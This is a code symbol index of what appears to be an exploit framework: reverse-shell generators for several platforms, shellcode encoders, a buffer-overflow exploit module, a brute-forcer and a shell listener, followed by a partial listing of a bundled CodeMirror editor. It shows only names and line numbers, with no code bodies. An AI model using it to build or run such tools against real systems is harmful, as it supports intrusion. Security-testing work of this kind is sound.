class BruteForcer (line 10) | class BruteForcer:
method __init__ (line 15) | def __init__(self):
method log (line 23) | def log(host=None, message=""):
method get_next_word (line 33) | def get_next_word(self):
method brute_loop (line 55) | def brute_loop(self):
method run (line 63) | def run(self):
FILE: core/Commands.py
class APIClient (line 22) | class APIClient:
method __init__ (line 23) | def __init__(self, wsclient):
method check_coding (line 26) | def check_coding(self, kwargs):
method hello (line 37) | def hello(self, module_name, type):
method send_command (line 42) | def send_command(self, command, **kwargs):
class API (line 55) | class API:
method callable (line 56) | def callable(foo):
method __init__ (line 65) | def __init__(self):
class Commands (line 69) | class Commands(API):
method __init__ (line 70) | def __init__(self, server):
method get_api_functions (line 82) | def get_api_functions(self):
method get_all_modules_paths (line 91) | def get_all_modules_paths(self):
method _get_wrapped_function_required_args (line 106) | def _get_wrapped_function_required_args(self, func):
method execute (line 114) | def execute(self, message, client):
method start_module (line 157) | def start_module(self, client, module_name, use_listener, use_custom_p...
method install_via_pip (line 198) | def install_via_pip(self, client, library_name):
method get_all_server_data (line 218) | def get_all_server_data(self, client):
method get_modules_log (line 236) | def get_modules_log(self, client):
method kill_process (line 244) | def kill_process(self, client, module_name):
method register_module_message (line 255) | def register_module_message(self, client, message, state, module_name,...
method get_module_options (line 280) | def get_module_options(self, client, module_name):
method get_module_args (line 297) | def get_module_args(self, client, module_name):
method gui_command_to_listener (line 309) | def gui_command_to_listener(self, client, module_name, message):
method on_listener_message (line 321) | def on_listener_message(self, client, module_name, message, state):
method get_listener_options (line 336) | def get_listener_options(self, client, module_name):
method add_listener_options (line 348) | def add_listener_options(self, client, module_name, options):
method add_listener_pid (line 360) | def add_listener_pid(self, client, module_name, pid):
method get_source (line 370) | def get_source(self, client, module_name):
method save_source (line 382) | def save_source(self, client, module_name, message):
method is_listener_connected (line 400) | def is_listener_connected(self, client, module_name):
method make_error (line 417) | def make_error(self, error_msg):
method send_error (line 420) | def send_error(self, client, error_msg):
method send_info (line 423) | def send_info(self, client, info_msg):
method generate_report (line 426) | def generate_report(self, module_name):
method send_message_to_ui (line 444) | def send_message_to_ui(self, message):
method send_message_to_listener (line 447) | def send_message_to_listener(self, module_name, message):
FILE: core/DirectoryTraversal.py
class DirTrav (line 2) | class DirTrav:
method __init__ (line 4) | def __init__(self):
method make_path (line 53) | def make_path(self, path, file_name, count):
FILE: core/Modules.py
class ModuleMessageElement (line 10) | class ModuleMessageElement:
method __init__ (line 11) | def __init__(self, message, type="text"):
method formatted (line 16) | def formatted(self):
class RunningModule (line 24) | class RunningModule:
method __init__ (line 25) | def __init__(self, module_name, options, pid=None, listener_pid=None, ...
class ModulesHandler (line 38) | class ModulesHandler:
method __init__ (line 39) | def __init__(self, commands_handler):
method add_module_pid (line 48) | def add_module_pid(self, module_name, pid):
method add_listener_pid (line 54) | def add_listener_pid(self, module_name, pid):
method add_message (line 60) | def add_message(self, module_name, new_message, state=None, inline=Fal...
method add_listener_message (line 73) | def add_listener_message(self, module_name, message, state=None):
method register_process (line 82) | def register_process(self, module_name, original_name, options):
method kill_process (line 92) | def kill_process(self, module_name):
method get_full_log (line 103) | def get_full_log(self):
method get_module_log (line 117) | def get_module_log(self, module_name):
method import_from_uri (line 133) | def import_from_uri(self, uri, absl=True):
method get_modules_info (line 166) | def get_modules_info(self, names):
method get_module_info (line 179) | def get_module_info(self, name):
method get_changed_options (line 188) | def get_changed_options(self, module_name):
method get_available_options_for_module (line 193) | def get_available_options_for_module(self, module_name):
method get_module_inst_by_name (line 200) | def get_module_inst_by_name(self, module_name):
method make_unique_name (line 203) | def make_unique_name(self, module_name, suffix=1):
method get_busy_ports_list (line 213) | def get_busy_ports_list(self):
function get_modules_names_dict (line 222) | def get_modules_names_dict(path_to_files):
function _attach (line 232) | def _attach(branch, module, trunk):
function make_tree (line 253) | def make_tree(modules):
function is_module_in_trunk (line 263) | def is_module_in_trunk(trunk, name):
FILE: core/OptionsParser.py
class OptionsParser (line 3) | class OptionsParser:
method __init__ (line 4) | def __init__(self):
method parse_data (line 7) | def parse_data(self, data):
method prepare_options (line 22) | def prepare_options(self, options):
FILE: core/PortScannerMT.py
class ScannerThread (line 8) | class ScannerThread(threading.Thread):
method __init__ (line 9) | def __init__(self, inq, outq):
method run (line 17) | def run(self):
class Scanner (line 32) | class Scanner:
method __init__ (line 33) | def __init__(self, from_port, to_port, host='localhost'):
method check_port_state (line 46) | def check_port_state(self, port):
method scan (line 57) | def scan(self, search_for='opened',first_match=False, nthreads=1, send...
method _finish_scan (line 109) | def _finish_scan(self):
FILE: core/ReportGenerator.py
class ReportGenerator (line 3) | class ReportGenerator:
method __init__ (line 4) | def __init__(self):
method _generate_content (line 12) | def _generate_content(self, module):
method append_module (line 51) | def append_module(self, module):
method generate_report (line 55) | def generate_report(self):
method read_file_content (line 64) | def read_file_content(self, filename):
method _rewrite_report (line 70) | def _rewrite_report(self):
FILE: core/ServiceMessagesHandler.py
class ServiceMessageLevel (line 3) | class ServiceMessageLevel:
class ServiceMessageType (line 10) | class ServiceMessageType:
class ServiceMessage (line 15) | class ServiceMessage:
method __init__ (line 16) | def __init__(self, message, message_type, level, **kwargs):
method serialize (line 23) | def serialize(self):
class ServiceMessagesHandler (line 27) | class ServiceMessagesHandler:
method __init__ (line 28) | def __init__(self):
method reset (line 31) | def reset(self):
method remove_import_error (line 34) | def remove_import_error(self, library_name):
method get_grouped (line 37) | def get_grouped(self):
method serialize (line 55) | def serialize(self):
method add_message (line 58) | def add_message(self, message, message_type=ServiceMessageType.IMPORT,...
method get_messages (line 64) | def get_messages(self, message_type=None, level=None):
FILE: core/Sploit.py
function _deco (line 23) | def _deco(self, func):
class Sploit (line 39) | class Sploit:
method __init__ (line 43) | def __init__(self, logfile="", debugfile="", logger=None, options={}):
method create_args (line 68) | def create_args(self, options={}):
method args (line 76) | def args(self, options={}):
method get_listener_options (line 83) | def get_listener_options(self):
method check (line 90) | def check(self):
method run (line 97) | def run(self):
method logImage (line 104) | def logImage(self, image):
method log (line 122) | def log(self, message='', inline=False, replace=False):
method finish (line 137) | def finish(self, is_successful):
method writefile (line 150) | def writefile(self, filedata, filename=""):
method connect_to_remote_shell (line 187) | def connect_to_remote_shell(self, target_ip, target_port):
method send_message (line 203) | def send_message(self, message, is_successful=None, inline=False, repl...
method is_listener_connected (line 211) | def is_listener_connected(self):
method hello (line 222) | def hello(self):
method random_string (line 225) | def random_string(self, size=6, chars=ascii_letters + digits):
FILE: core/WebHelper.py
class FormPoster (line 14) | class FormPoster:
method __init__ (line 15) | def __init__(self):
method post (line 20) | def post(self, target, additional_headers={}):
method _encode_multipart_formdata (line 37) | def _encode_multipart_formdata(self):
method add_field (line 63) | def add_field(self, key, value):
method add_file (line 66) | def add_file(self, key, filename, file, is_path=True, content_type=''):
class NoRedirection (line 74) | class NoRedirection(urllib2.HTTPErrorProcessor):
method http_response (line 81) | def http_response(self, request, response):
method open_http_address (line 84) | def open_http_address(self, address):
function wordpress_auth (line 92) | def wordpress_auth(host, username, password):
class SimpleWebServerHandler (line 126) | class SimpleWebServerHandler(BaseHTTPRequestHandler):
method do_GET (line 128) | def do_GET(self):
class AdavancedHttpServerHandler (line 135) | class AdavancedHttpServerHandler(BaseHTTPRequestHandler):
method do_GET (line 136) | def do_GET(self):
method download_file (line 155) | def download_file(self, filename):
class SimpleWebServer (line 166) | class SimpleWebServer:
method __init__ (line 167) | def __init__(self, host, port):
method set_headers (line 187) | def set_headers(self, headers={}):
method add_header (line 190) | def add_header(self, key, value):
method create_temp_folder (line 193) | def create_temp_folder(self):
method add_file_for_share (line 201) | def add_file_for_share(self, filename, content, server_path=''):
method add_folder_for_share (line 222) | def add_folder_for_share(self, local_path):
method start_serve (line 234) | def start_serve(self):
method start_with_content (line 246) | def start_with_content(self, content):
method stop_serve (line 257) | def stop_serve(self):
FILE: core/WebSocketServer.py
class ClientTypes (line 31) | class ClientTypes:
class WebSocketServer (line 37) | class WebSocketServer(asyncore.dispatcher):
method __init__ (line 41) | def __init__(self, host, port, connections):
method handle_accept (line 52) | def handle_accept(self):
method handle_close (line 57) | def handle_close(self):
method add_process (line 60) | def add_process(self, pid):
method remove_process (line 63) | def remove_process(self, pid):
method kill_all_processes (line 71) | def kill_all_processes(self):
method get_client_by_name_and_type (line 82) | def get_client_by_name_and_type(self, name, client_type=ClientTypes.li...
method send_message_to_listener (line 88) | def send_message_to_listener(self, name, message):
method send_message_to_all_uis (line 93) | def send_message_to_all_uis(self, message):
class WebsocketHandler (line 99) | class WebsocketHandler(asyncore.dispatcher):
method __init__ (line 103) | def __init__(self, sock, server=None):
method writable (line 115) | def writable(self):
method readable (line 119) | def readable(self):
method handle_write (line 123) | def handle_write(self):
method send_message (line 128) | def send_message(self, message):
method handle_read (line 142) | def handle_read(self):
method handshake (line 149) | def handshake(self):
method read_bytes_splitted (line 166) | def read_bytes_splitted(self, num):
method read_bytes (line 174) | def read_bytes(self, num):
method recv_all (line 179) | def recv_all(self, chunk=4096):
method read_next_message (line 194) | def read_next_message(self):
method on_message (line 233) | def on_message(self, message):
method hello (line 243) | def hello(self, args, uuid):
method check_and_make_unique_name (line 257) | def check_and_make_unique_name(self, name, suffix=1):
method handle_close (line 268) | def handle_close(self):
function parse_json (line 274) | def parse_json(message):
function json_encode (line 286) | def json_encode(message):
FILE: core/helpers/archieve/jar.py
class Jar (line 4) | class Jar(Zip):
method __init__ (line 5) | def __init__(self, filename=''):
method get_manifest (line 10) | def get_manifest(self, main_class='east.Payload'):
method add_file (line 16) | def add_file(self, name, content='', write_to_manifest=True):
method __add_file_to_manifest (line 21) | def __add_file_to_manifest(self, filename):
method create_manifest (line 24) | def create_manifest(self):
method get_raw (line 28) | def get_raw(self, remove_temp=False):
method get_jar (line 39) | def get_jar(self):
FILE: core/helpers/archieve/zip.py
class Zip (line 4) | class Zip:
method __init__ (line 5) | def __init__(self, filename=''):
method create_archieve (line 11) | def create_archieve(self, filename):
method add_file (line 17) | def add_file(self, name, content=''):
method is_valid (line 29) | def is_valid(self, filename=''):
FILE: core/helpers/java/Serialization.py
class Constants (line 4) | class Constants:
class Element (line 48) | class Element:
method __init__ (line 49) | def __init__(self, stream=""):
method decode (line 52) | def decode(self, io):
method encode (line 55) | def encode(self):
method __str__ (line 58) | def __str__(self):
class Annotation (line 62) | class Annotation(Element):
method __init__ (line 63) | def __init__(self, stream=None):
method decode (line 67) | def decode(self, io):
method encode (line 75) | def encode(self):
method __str__ (line 83) | def __str__(self):
class BlockData (line 91) | class BlockData(Element):
method __init__ (line 92) | def __init__(self, stream=None, contents=''):
method decode (line 97) | def decode(self, io):
method encode (line 110) | def encode(self):
method __str__ (line 115) | def __str__(self):
class BlockDataLong (line 123) | class BlockDataLong(Element):
method __init__ (line 124) | def __init__(self, stream=None, contents=''):
method decode (line 129) | def decode(self, io):
method encode (line 142) | def encode(self):
method __str__ (line 147) | def __str__(self):
class ClassDesc (line 151) | class ClassDesc(Element):
method __init__ (line 152) | def __init__(self, stream=None):
method decode (line 156) | def decode(self, io):
method encode (line 164) | def encode(self):
method __str__ (line 172) | def __str__(self):
class EndBlockData (line 175) | class EndBlockData(Element):
class Field (line 179) | class Field(Element):
method __init__ (line 180) | def __init__(self, stream=''):
method decode (line 186) | def decode(self, io):
method encode (line 197) | def encode(self):
method is_type_valid (line 210) | def is_type_valid(self):
method is_primitive (line 215) | def is_primitive(self):
method is_object (line 220) | def is_object(self):
method is_valid (line 225) | def is_valid(self, code):
method encode_field_type (line 230) | def encode_field_type(self):
method decode_field_type (line 237) | def decode_field_type(self, io):
method __str__ (line 244) | def __str__(self):
class NewArray (line 253) | class NewArray(Element):
method __init__ (line 254) | def __init__(self, stream=''):
method decode (line 260) | def decode(self, io):
method encode (line 272) | def encode(self):
method decode_values_length (line 282) | def decode_values_length(self, io):
method array_type (line 288) | def array_type(self):
method decode_value (line 307) | def decode_value(self, io):
method encode_value (line 352) | def encode_value(self, value):
method __str__ (line 375) | def __str__(self):
class NewClass (line 381) | class NewClass(Element):
method __init__ (line 382) | def __init__(self, stream=''):
method decode (line 386) | def decode(self, io):
method encode (line 393) | def encode(self):
method __str__ (line 400) | def __str__(self):
class NewClassDesc (line 404) | class NewClassDesc(Element):
method __init__ (line 405) | def __init__(self, stream=''):
method decode (line 414) | def decode(self, io):
method encode (line 432) | def encode(self):
method decode_serial_version (line 446) | def decode_serial_version(self, io):
method decode_flags (line 452) | def decode_flags(self, io):
method decode_fields_length (line 458) | def decode_fields_length(self, io):
method __str__ (line 464) | def __str__(self):
class NewEnum (line 476) | class NewEnum(Element):
method __init__ (line 477) | def __init__(self, stream=''):
method decode (line 482) | def decode(self, io):
method encode (line 490) | def encode(self):
method decode_constant_name (line 498) | def decode_constant_name(self, io):
class NewObject (line 505) | class NewObject(Element):
method __init__ (line 506) | def __init__(self, stream=None):
method decode (line 511) | def decode(self, io):
method encode (line 524) | def encode(self):
method decode_class_data (line 536) | def decode_class_data(self, io, my_class_desc):
method decode_class_fields (line 547) | def decode_class_fields(self, io, my_class_desc):
method decode_value (line 557) | def decode_value(self, io, type):
method encode_value (line 594) | def encode_value(self, value):
method __str__ (line 616) | def __str__(self):
class NullReference (line 631) | class NullReference(Element):
class ProxyClassDesc (line 635) | class ProxyClassDesc(Element):
method __init__ (line 636) | def __init__(self, stream=''):
method decode (line 642) | def decode(self, io):
method encode (line 656) | def encode(self):
method decode_interfaces_length (line 667) | def decode_interfaces_length(self, io):
method __str__ (line 673) | def __str__(self):
class Reference (line 685) | class Reference(Element):
method __init__ (line 686) | def __init__(self, stream=''):
method decode (line 690) | def decode(self, io):
method encode (line 697) | def encode(self):
method __str__ (line 704) | def __str__(self):
class Reset (line 708) | class Reset(Element):
class Stream (line 712) | class Stream(Element):
method __init__ (line 713) | def __init__(self, stream=None):
method decode (line 720) | def decode(self, io):
method encode (line 731) | def encode(self):
method add_reference (line 739) | def add_reference(self, ref):
method decode_magic (line 742) | def decode_magic(self, io):
method decode_version (line 749) | def decode_version(self, io):
class Utf (line 757) | class Utf(Element):
method __init__ (line 758) | def __init__(self, stream='', contents=''):
method decode (line 763) | def decode(self, io):
method encode (line 776) | def encode(self):
method __str__ (line 781) | def __str__(self):
class LongUtf (line 785) | class LongUtf(Utf):
method decode (line 786) | def decode(self, io):
method encode (line 799) | def encode(self):
function decode_content (line 805) | def decode_content(io, stream):
function encode_content (line 863) | def encode_content(content):
function print_content (line 899) | def print_content(content):
function print_class (line 935) | def print_class(content):
function get_key_by_value (line 940) | def get_key_by_value(dictionary, search_value):
FILE: docs/files/template.py
class exploit (line 24) | class exploit(Sploit):
method __init__ (line 25) | def __init__(self,host="",
method args (line 30) | def args(self):
method run (line 33) | def run(self):
FILE: docs/files/vulnserver_bof/vulnserver_buffer_overflow.py
class exploit (line 30) | class exploit(Sploit):
method __init__ (line 31) | def __init__(self,host="",
method args (line 36) | def args(self):
method generate_shellcode (line 47) | def generate_shellcode(self):
method run (line 60) | def run(self):
FILE: listener/bind_connector.py
class TCPBindConnector (line 10) | class TCPBindConnector(asyncore.dispatcher):
method __init__ (line 11) | def __init__(self):
method handle_connect (line 21) | def handle_connect(self):
method handle_close (line 24) | def handle_close(self):
method handle_read (line 30) | def handle_read(self):
method recv_all (line 35) | def recv_all(self, chunk=4096):
method handle_write (line 50) | def handle_write(self):
method hello (line 60) | def hello(self):
method run (line 63) | def run(self):
method get_options (line 71) | def get_options(self):
method send_message (line 75) | def send_message(self, message, state=0):
method recv_command (line 84) | def recv_command(self):
FILE: listener/listener.py
class ListenerHandler (line 15) | class ListenerHandler(asyncore.dispatcher):
method __init__ (line 16) | def __init__(self, sock, listener):
method handle_read (line 20) | def handle_read(self):
method recv_all (line 25) | def recv_all(self, chunk=4096):
method handle_write (line 40) | def handle_write(self):
method handle_close (line 51) | def handle_close(self):
class Listener (line 60) | class Listener(asyncore.dispatcher):
method __init__ (line 61) | def __init__(self):
method run (line 81) | def run(self):
method handle_accept (line 95) | def handle_accept(self):
method send_message (line 106) | def send_message(self, message, state=0):
method get_options (line 116) | def get_options(self):
method hello (line 121) | def hello(self):
FILE: shellcodes/Asm.py
class ShellGenerator (line 8) | class ShellGenerator:
method __init__ (line 9) | def __init__(self, OS_TARGET, OS_TARGET_ARCH):
method get_shellcode (line 21) | def get_shellcode(self, type, message="", connectback_ip="127.0.0.1", ...
class LinuxShellcodes (line 49) | class LinuxShellcodes():
method __init__ (line 53) | def __init__(self, OS_TARGET_ARCH):
method message (line 58) | def message(self, message=''):
method reverse (line 105) | def reverse(self, connectback_ip, connectback_port):
class WindowsShellcodes (line 422) | class WindowsShellcodes():
method __init__ (line 423) | def __init__(self, OS_TARGET_ARCH):
method message (line 428) | def message(self, message=''):
method command (line 513) | def command(self, command='calc.exe', technique='PEB'):
method reverse (line 743) | def reverse(self, connectback_ip, connectback_port):
method compute_hash_by (line 922) | def compute_hash_by(self, key, num=0xd):
FILE: shellcodes/DotNetShellcode.py
class AspxShellcode (line 4) | class AspxShellcode(Shellcode):
method __init__ (line 8) | def __init__(self, connectback_ip='localhost', connectback_port=5555,
method get_reverse (line 12) | def get_reverse(self, inline=False):
method get_shellcode (line 85) | def get_shellcode(self, inline=False):
FILE: shellcodes/Encoders.py
class EncoderError (line 13) | class EncoderError(Exception): pass
class Encoder (line 16) | class Encoder(object):
method encode (line 17) | def encode(self, payload):
class AlphanumericEncoder (line 20) | class AlphanumericEncoder(Encoder):
method __init__ (line 21) | def __init__(self, disallowed_chars="\x00\x0d\x0a", buffer_register='e...
method create_allowed_chars (line 26) | def create_allowed_chars(self, bad_chars):
method encode (line 33) | def encode(self, payload):
method create_decoder_stub (line 46) | def create_decoder_stub(self, reg):
method gen_decoder_prefix (line 67) | def gen_decoder_prefix(self, reg):
method encode_byte (line 98) | def encode_byte(self, block):
class XorEncoder (line 130) | class XorEncoder(Encoder):
method __init__ (line 131) | def __init__(self, disallowed_chars=(0x00, 0x0D, 0x0A)):
method set_disallowed_chars (line 135) | def set_disallowed_chars(self, chars):
method _get_supported_register_sets (line 141) | def _get_supported_register_sets(self):
method _get_register_set (line 144) | def _get_register_set(self, register_set):
method _get_header (line 147) | def _get_header(self):
method _get_payload_size_position (line 150) | def _get_payload_size_position(self):
method _get_xor_key_position (line 153) | def _get_xor_key_position(self):
method _encode_payload (line 156) | def _encode_payload(self, payload, register_sets):
method _prefix_header (line 179) | def _prefix_header(self, payload, register_sets):
method encode (line 208) | def encode(self, payload, register_sets=[]):
method encode_to_string (line 233) | def encode_to_string(self, payload, register_sets=[]):
class FnstenvXorEncoder (line 241) | class FnstenvXorEncoder(XorEncoder):
method _get_supported_register_sets (line 275) | def _get_supported_register_sets(self):
method _get_register_set (line 278) | def _get_register_set(self, register_set):
method _get_header (line 281) | def _get_header(self):
method _get_payload_size_position (line 284) | def _get_payload_size_position(self):
method _get_xor_key_position (line 287) | def _get_xor_key_position(self):
class JumpCallXorEncoder (line 291) | class JumpCallXorEncoder(XorEncoder):
method _get_header (line 316) | def _get_header(self):
method _get_supported_register_sets (line 319) | def _get_supported_register_sets(self):
method _get_register_set (line 322) | def _get_register_set(self, register_set):
method _get_payload_size_position (line 325) | def _get_payload_size_position(self):
method _get_xor_key_position (line 328) | def _get_xor_key_position(self):
class CodeEncoders (line 332) | class CodeEncoders:
method __init__ (line 337) | def __init__(self, OS_SYSTEM, OS_TARGET, OS_TARGET_ARCH, BADCHARS):
method encode_shellcode (line 348) | def encode_shellcode(self, _byte_array, encoder_type, debug=0):
method clean_bad_chars (line 368) | def clean_bad_chars(self, orig_array, payload):
method xor_bytes (line 379) | def xor_bytes(self, byte_array):
method xor_decoder (line 393) | def xor_decoder(self, _shellcode, debug=0):
method xor_encoder (line 454) | def xor_encoder(self, _byte_arr, debug=0):
method rot_13_decoder (line 499) | def rot_13_decoder(self, _shellcode, debug=0):
method rot_13_encoder (line 552) | def rot_13_encoder(self, _shellcode, debug=0):
method fnst_encoder (line 580) | def fnst_encoder(self, _byte_array, debug):
method jumpcall_encoder (line 588) | def jumpcall_encoder(self, _byte_array, debug):
method alphanum_encoder (line 596) | def alphanum_encoder(self, byte_str, debug=0, buffer_register='ecx'):
FILE: shellcodes/JavaShellcode.py
class JavaShellcodes (line 6) | class JavaShellcodes(Shellcode):
method __init__ (line 10) | def __init__(self, connectback_ip='localhost', connectback_port=5555,
method get_jsp (line 18) | def get_jsp(self, inline=False):
method get_jar (line 75) | def get_jar(self, filename=""):
method get_shellcode (line 89) | def get_shellcode(self, inline=False):
FILE: shellcodes/PhpShellcode.py
class PhpShellcodes (line 4) | class PhpShellcodes(Shellcode):
method __init__ (line 9) | def __init__(self, connectback_ip='localhost', connectback_port=5555):
method get_phpinfo (line 14) | def get_phpinfo(self, badchars):
method get_phpcode (line 19) | def get_phpcode(self, localhost, localport):
method get_php_code_inline (line 70) | def get_php_code_inline(self, host, port):
method get_shellcode (line 76) | def get_shellcode(self, inline=False):
FILE: shellcodes/PythonShellcode.py
class PythonShellcodes (line 2) | class PythonShellcodes(Shellcode):
method __init__ (line 7) | def __init__(self, connectback_ip='localhost', connectback_port=5555):
method get_python_code (line 12) | def get_python_code(self, badchars, localhost, localport):
method get_shellcode (line 61) | def get_shellcode(self, inline=False):
FILE: shellcodes/Runshellcode.py
class RunShellcode (line 8) | class RunShellcode():
method run (line 9) | def run(self, shellcode_string, platform, encoder=''):
FILE: shellcodes/ShellUtils.py
class Constants (line 13) | class Constants:
class OS (line 18) | class OS:
class OS_ARCH (line 22) | class OS_ARCH:
class EncoderType (line 26) | class EncoderType:
class ShellcodeType (line 33) | class ShellcodeType:
class JavaShellcodeType (line 40) | class JavaShellcodeType:
class ShellcodeConnection (line 44) | class ShellcodeConnection:
function is_os_64bit (line 49) | def is_os_64bit():
function search_file (line 53) | def search_file(filename, search_path):
function write_file (line 63) | def write_file(data, file_ext='', file_name=''):
function get_objective_code (line 85) | def get_objective_code(asm_file, target_arch, debug=0):
function objdump (line 133) | def objdump(obj_file, os_target_arch, debug=0):
function create_shellcode (line 184) | def create_shellcode(asm_code, os_target, os_target_arch, make_exe=0, de...
function generate_dll (line 207) | def generate_dll(os_target, os_target_arch, asm_code, filename, dll_inj_...
function make_binary_from_obj (line 220) | def make_binary_from_obj(o_file, os_target, os_target_arch, debug=0, is_...
function is_os_64bit (line 273) | def is_os_64bit():
function extract_shell_from_obj (line 277) | def extract_shell_from_obj(file):
function read_binary (line 293) | def read_binary(filename):
function replace_by_real_values (line 300) | def replace_by_real_values(shellcode, kwargs):
function ip_to_hex (line 306) | def ip_to_hex(ip, is_big=True):
function port_to_hex (line 313) | def port_to_hex(port, is_big=True):
function validate_ip_addr (line 319) | def validate_ip_addr(addr):
function ip_to_dd (line 328) | def ip_to_dd(addr):
function port_to_dd (line 332) | def port_to_dd(port):
FILE: shellcodes/ShellcodeGenerator.py
class ShellGenerator (line 6) | class ShellGenerator:
method __init__ (line 7) | def __init__(self, os_target, os_target_arch):
method check_settings (line 14) | def check_settings(self, addr, port):
method check_for_system_utils (line 24) | def check_for_system_utils(self):
method _make_path (line 36) | def _make_path(self, *paths):
method get_shellcode (line 44) | def get_shellcode(self, shellcode_type, connectback_ip="127.0.0.1", co...
method read_and_replace (line 94) | def read_and_replace(self, path, values, use_precompiled):
class ShellcodeToExe (line 107) | class ShellcodeToExe:
method __init__ (line 108) | def __init__(self, shellcode, target_os, target_arch, filename='', dll...
method mkdirs (line 116) | def mkdirs(self):
method create_win_x86_exe (line 120) | def create_win_x86_exe(self):
method create_win_x86_64_exe (line 148) | def create_win_x86_64_exe(self):
method create_linux_x86_exe (line 176) | def create_linux_x86_exe(self):
method create_linux_x86_64_exe (line 184) | def create_linux_x86_64_exe(self):
method create_x86_dll (line 194) | def create_x86_dll(self):
method create_executable (line 244) | def create_executable(self):
method write_file (line 265) | def write_file(self, data, path):
FILE: shellcodes/Shellcodes.py
class OSShellcodes (line 18) | class OSShellcodes:
method __init__ (line 23) | def __init__(self, OS_TARGET, OS_TARGET_ARCH, CONNECTBACK_IP='localhos...
method create_shellcode (line 44) | def create_shellcode(self, _shellcode_type='reverse', command='calc.ex...
method get_exe_path (line 86) | def get_exe_path(self):
method get_dll_path (line 91) | def get_dll_path(self):
class CrossOSShellcodes (line 97) | class CrossOSShellcodes:
method __init__ (line 98) | def __init__(self, CONNECTBACK_IP='localhost', CONNECTBACK_PORT=5555):
method create_shellcode (line 107) | def create_shellcode(self, type, inline=False):
FILE: shellcodes/data/java/src/ReverseTCP/Payload.java
class Payload (line 6) | public class Payload extends ClassLoader{
method main (line 8) | public static void main(String[] args) throws IOException {
method executeCommand (line 34) | public static String executeCommand(String[] command) {
method parseFileContent (line 56) | public static String[] parseFileContent(String path) {
method isWindows (line 76) | public static boolean isWindows() {
method isUnix (line 80) | public static boolean isUnix() {
FILE: shellcodes/shellcode.py
class Shellcode (line 1) | class Shellcode:
method __init__ (line 2) | def __init__(self, os_target='', os_target_arch='', connectback_ip='lo...
method get_shellcode (line 10) | def get_shellcode(self, inline=False):
method make_inline (line 13) | def make_inline(self, payload):
FILE: start.py
class FrameworkStarter (line 21) | class FrameworkStarter:
method __init__ (line 22) | def __init__(self, host="localhost", ws_port=49999, port=80):
method prepare_logging (line 34) | def prepare_logging(self, verbose):
method prepare_environment (line 50) | def prepare_environment(self):
method install_missing_deps (line 57) | def install_missing_deps(self):
method install_python_lib (line 80) | def install_python_lib(self, relative_path):
method parse_args (line 92) | def parse_args(self):
method start_servers (line 107) | def start_servers(self):
FILE: ui/httpd.py
class HTTPRequestHandler (line 26) | class HTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
method do_GET (line 38) | def do_GET(self):
method do_HEAD (line 45) | def do_HEAD(self):
method log_message (line 51) | def log_message(self, format, *args):
method send_head (line 54) | def send_head(self):
method list_directory (line 95) | def list_directory(self, path):
method translate_path (line 135) | def translate_path(self, path):
method copyfile (line 155) | def copyfile(self, source, outputfile):
method guess_type (line 168) | def guess_type(self, path):
function startHttpServer (line 199) | def startHttpServer(HandlerClass = HTTPRequestHandler,
FILE: ui/js/codemirror.js
function CodeMirror (line 61) | function CodeMirror(place, options) {
function Display (line 122) | function Display(place, doc) {
function loadMode (line 246) | function loadMode(cm) {
function resetModeState (line 251) | function resetModeState(cm) {
function wrappingChanged (line 262) | function wrappingChanged(cm) {
function estimateHeight (line 279) | function estimateHeight(cm) {
function estimateLineHeights (line 297) | function estimateLineHeights(cm) {
function keyMapChanged (line 305) | function keyMapChanged(cm) {
function themeChanged (line 311) | function themeChanged(cm) {
function guttersChanged (line 317) | function guttersChanged(cm) {
function updateGutters (line 325) | function updateGutters(cm) {
function updateGutterSpace (line 340) | function updateGutterSpace(cm) {
function lineLength (line 349) | function lineLength(line) {
function findMaxLine (line 368) | function findMaxLine(cm) {
function setGuttersForLineNumbers (line 384) | function setGuttersForLineNumbers(options) {
function hScrollbarTakesSpace (line 396) | function hScrollbarTakesSpace(cm) {
function measureForScrollbars (line 402) | function measureForScrollbars(cm) {
function updateScrollbars (line 416) | function updateScrollbars(cm, measure) {
function visibleLines (line 473) | function visibleLines(display, doc, viewport) {
function alignHorizontally (line 497) | function alignHorizontally(cm) {
function maybeUpdateLineNumberWidth (line 516) | function maybeUpdateLineNumberWidth(cm) {
function lineNumberFor (line 534) | function lineNumberFor(options, i) {
function compensateForHScroll (line 541) | function compensateForHScroll(display) {
function DisplayUpdate (line 547) | function DisplayUpdate(cm, viewport, force) {
function updateDisplayIfNeeded (line 564) | function updateDisplayIfNeeded(cm, update) {
function postUpdateDisplay (line 632) | function postUpdateDisplay(cm, update) {
function updateDisplaySimple (line 662) | function updateDisplaySimple(cm, viewport) {
function setDocumentHeight (line 674) | function setDocumentHeight(cm, measure) {
function checkForWebkitWidthBug (line 679) | function checkForWebkitWidthBug(cm, measure) {
function updateHeightsInViewport (line 690) | function updateHeightsInViewport(cm) {
function updateWidgetHeight (line 717) | function updateWidgetHeight(line) {
function getDimensions (line 724) | function getDimensions(cm) {
function patchDisplay (line 741) | function patchDisplay(cm, updateNumbersFrom, dims) {
function updateLineForChanges (line 786) | function updateLineForChanges(cm, lineView, lineN, dims) {
function ensureLineWrapped (line 799) | function ensureLineWrapped(lineView) {
function updateLineBackground (line 810) | function updateLineBackground(lineView) {
function getLineContent (line 824) | function getLineContent(cm, lineView) {
function updateLineText (line 837) | function updateLineText(cm, lineView) {
function updateLineClasses (line 852) | function updateLineClasses(lineView) {
function updateLineGutter (line 862) | function updateLineGutter(cm, lineView, lineN, dims) {
function updateLineWidgets (line 889) | function updateLineWidgets(lineView, dims) {
function buildLineElement (line 900) | function buildLineElement(cm, lineView, lineN, dims) {
function insertLineWidgets (line 914) | function insertLineWidgets(lineView, dims) {
function insertLineWidgetsFor (line 920) | function insertLineWidgetsFor(line, lineView, dims, allowAbove) {
function positionLineWidget (line 935) | function positionLineWidget(widget, node, lineView, dims) {
function copyPos (line 965) | function copyPos(x) {return Pos(x.line, x.ch);}
function maxPos (line 966) | function maxPos(a, b) { return cmp(a, b) < 0 ? b : a; }
function minPos (line 967) | function minPos(a, b) { return cmp(a, b) < 0 ? a : b; }
function Selection (line 976) | function Selection(ranges, primIndex) {
function Range (line 1013) | function Range(anchor, head) {
function normalizeSelection (line 1028) | function normalizeSelection(ranges, primIndex) {
function simpleSelection (line 1044) | function simpleSelection(anchor, head) {
function clipLine (line 1050) | function clipLine(doc, n) {return Math.max(doc.first, Math.min(n, doc.fi...
function clipPos (line 1051) | function clipPos(doc, pos) {
function clipToLen (line 1057) | function clipToLen(pos, linelen) {
function isLine (line 1063) | function isLine(doc, l) {return l >= doc.first && l < doc.first + doc.si...
function clipPosArray (line 1064) | function clipPosArray(doc, array) {
